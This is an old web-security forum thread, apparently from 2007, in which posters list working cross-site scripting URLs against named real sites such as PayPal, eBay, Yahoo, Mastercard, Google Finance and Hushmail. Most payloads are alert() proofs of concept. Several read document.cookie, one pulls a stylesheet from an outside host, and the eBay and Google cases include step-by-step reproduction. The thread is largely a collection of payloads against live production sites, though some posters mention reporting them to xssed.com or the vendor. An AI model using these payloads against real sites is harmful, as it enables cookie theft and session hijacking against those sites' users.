Wow that one rocks even more! nice work!

http://www.census.gov/cgi-bin/gazetteer?city=<script>alert("Utterly Useless");</script>
I got bored. Really bored.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.ice.gov/exec/whereis/?qu=<script>document.title="Bored";</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.w4ck1ng.com/denied.php

Spits back an unsanitized user-agent, could be hit with forced forging of headers. Which begs the question, how many methods do we all know for forcing forged headers other than the old flash vector?

Also, why are we still trusting $_SERVER[]? :S

Not so dangerous but...

hxxp://answercenter.ebay.com/doRedirect.jspa?url=javascript:alert('Nemessis-WWW.RSTZONE.ORG-Firefox-Only')

(It works only with Firefox)



Edited 1 time(s). Last edit at 11/04/2007 07:00AM by nemessis.

PayPal.com

knowledge.paypal.com/paypal/documentDisplay.do?clusterName=PaypalCluster&preview=1&groupId=1&page=http://knowledge.paypal.com/paypal/solution.jsp?id="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>&docType=1006&resultType=5002&docProp=$solution_id&docPropValue=vs3422

very nice,few days ago I have sent one to xssed.com and now I have others two, always in paypal.

They still have old pages with some issues but I really like how they patch everything very fast.

Yahoo (Works with IE6)

hxxp://kr.blog.yahoo.com/dudnfkd031/GALLERY/show_image_v2.html?img=javascript:alert(/Nemessis/)

hxxp://cn.widget.yahoo.com/gallery/view.htm?widgetID=237&cate="><script>alert(/Nemessis/)</script>

hxxp://xk.cn.yahoo.com/category.cgi?category="><script>alert(/Nemessis/)</script>

hxxp://captcha.chat.yahoo.com/go/captchat/?img=javascript:alert(/Nemessis/)

Allready submited to xssed.com. Tommorow I will post an entire Yahoo! subdomain full of cross site scripting vulnerabilities.

Mastercard

http://www.mastercard.com/us/personal/en/cardholderservices/securecode/shop_online_results.html?letter=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E


http://www.mastercardbrandcenter.com/mcbrand/us/getourbrand.do?pageId=dl_1210&expertVisible="><script>alert("XSS by Fugitif")</script>

http://www.cyberdefender.com/phishing_alerts.html

they speaks of phishing attack and scam ? LOL

and is more velnerable of others

1

http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view="><script>alert(/XSS by Fugitif/)</script>

2

http://www.cyber-defender.com/EDC/download/1/?affl=cdsite_edc&campaign_code="><script>alert(/XSS by Fugitif/)</script>

and 3


http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view=160&lang='

http://www.cyberdefender.com/phishing_alerts.html?email=a%22%3E<p>%3Cimg%20src=%22//ha.ckers.org/images/stallowned.jpg

It only takes a couple of minutes to find ... and a lack of input validation.

http://www.lowes.com/lowes/lkn?action=productList&N=0&Ntk=i_products&Ntt=<script>alert('xss')</script>

wanna buy something?

[www.futureshop.ca]



Edited 1 time(s). Last edit at 11/16/2007 04:30PM by nav.

http://search.chacha.com/search/query?query=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&mode=web&wsid=UK
sadly they filter out all dangerous characters from the search textbox when focus is lost...but they allow you to enter them directly via the url.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Based on my current blog post XCSS injection :)
http://www.csszengarden.com/?cssfile=//businessinfo.co.uk/labs/xcss/xcss.css

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://www.broadcaster.com/video/search.php?s=dance%20%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%21%5B
http://www.broadcaster.com/members/search/?s=<script>alert('xss')</script>&category=vodcast&db=weird&search=videos&section=mobile_vod

-tx @ lowtech-labs.org

C.O.M.O.D.O - Creating trust online

Sent an email to Comodo telling them they have XSS on there site, responce

----------------------------------------------------------------------------
Hi,

Sorry for the inconvenience caused.

Now You can download the latest release 3.0.13.268 from http://personalfirewall.comodo.com and uninstall the existing, restart the computer and install the latest.

It will fix your issue.

For more info, Please do refer our forum..
http://forums.comodo.com/feedbackcommentsannouncementsnews/comodo_ firewall_pro_3_has_been_released-t14915.0.html

--------------------------------------------------------

For some reason they havent realised the problem is with there website, anyway here you go!


http://www.personalfirewall.comodo.com/leak/cpil.html?".'><Script>alert('XSS')</script>"

Any new ones for technorati, delicious or other popular social bookmarking sites?

;)

Here's one: http://vuln.xssed.net/2007/11/21/profiles.friendster.com/

For Friendster ;)

http://blogpost.imageshack.us/blogpost/postblog_multi.php?back=%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E">

http://blogmarks.net/search/%255C%2522%253E%253Cscript%253Ealert%2528%252Fxss%252F%2529%253C%252Fscript%253E%253C%2521

-tx @ lowtech-labs.org

XSS on Google.com

Ok..My XSS alert is here
http://finance.google.com/finance/portfolio?action=add&hash

How you see in the screen we need authentication.



Good,I go inside with my account and now I try to add something on my
Portofolio. I try to add something like this

"><script>alert(/XSS/)</script> OR: like this "><script>alert(
document.cookie)</script> :)



After I have put that string and I press the key "Add to portofolio" we
can see the surprise




That's all,sorry for those screen,I can't show you in other way

www.hushmail.com

Geez I thought they'd get basic bloody filtering right! From now on I'm not using another webmail service! Arrrggghhhh the web is a mess.

Sending an email to any Hushmail account with this:-
"></tr><script>alert(/XSS/)</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> www.hushmail.com
>
> Geez I thought they'd get basic bloody filtering
> right! From now on I'm not using another webmail
> service! Arrrggghhhh the web is a mess.
>
> Sending an email to any Hushmail account with
> this:-
> ">alert(/XSS/)

Wow that was is really bad... This is.. just hushmail right?

Yeah just Hushmail, I was quite shocked that their security is so bad. I'm never using the service again and they even require you to use Javascript so there's no workaround. I just can't see how it can be a mistake, I mean really what were they thinking?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://restore.holonyx.com/index.php?option=com_content&view=article&id=25"><script>alert('xss')</script>]!><![&Itemid=28

-tx @ lowtech-labs.org

Hushmail has more issues regarding flawed encryption, I read it a week ago someplace.

hushmail has simply lost all credibility. Release/warez groups are better off sending off their public keys in their .nfo files.

Of course then there's the issue of setting up a CA when pretty much no one, including the CA can be trusted. Now how's that for an oxymoron.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I am still Fugitif and now I want to show you how can work one vulnerable XSS Alert Bug on Ebay.com.
To be more precise our link now is http://togo.ebay.com

Ok..My XSS alert can be found here http://togo.ebay.com/affiliates/create/



I go to select one version and I crush above



and immediately later click "I WANT THIS ONE"


In the square where asks FOR "ID" I put some string like this "><script>alert(document.cookie)</script> ( or nothing we go directly on the "Browse" )



and click "Browse"




Now we cannot do anything else other than to use the search with our magic string

"><script>alert(document.cookie)</script>

Result ? !




That's all (sorry another time for the screen... coz only so I can have shown)


/Fugitif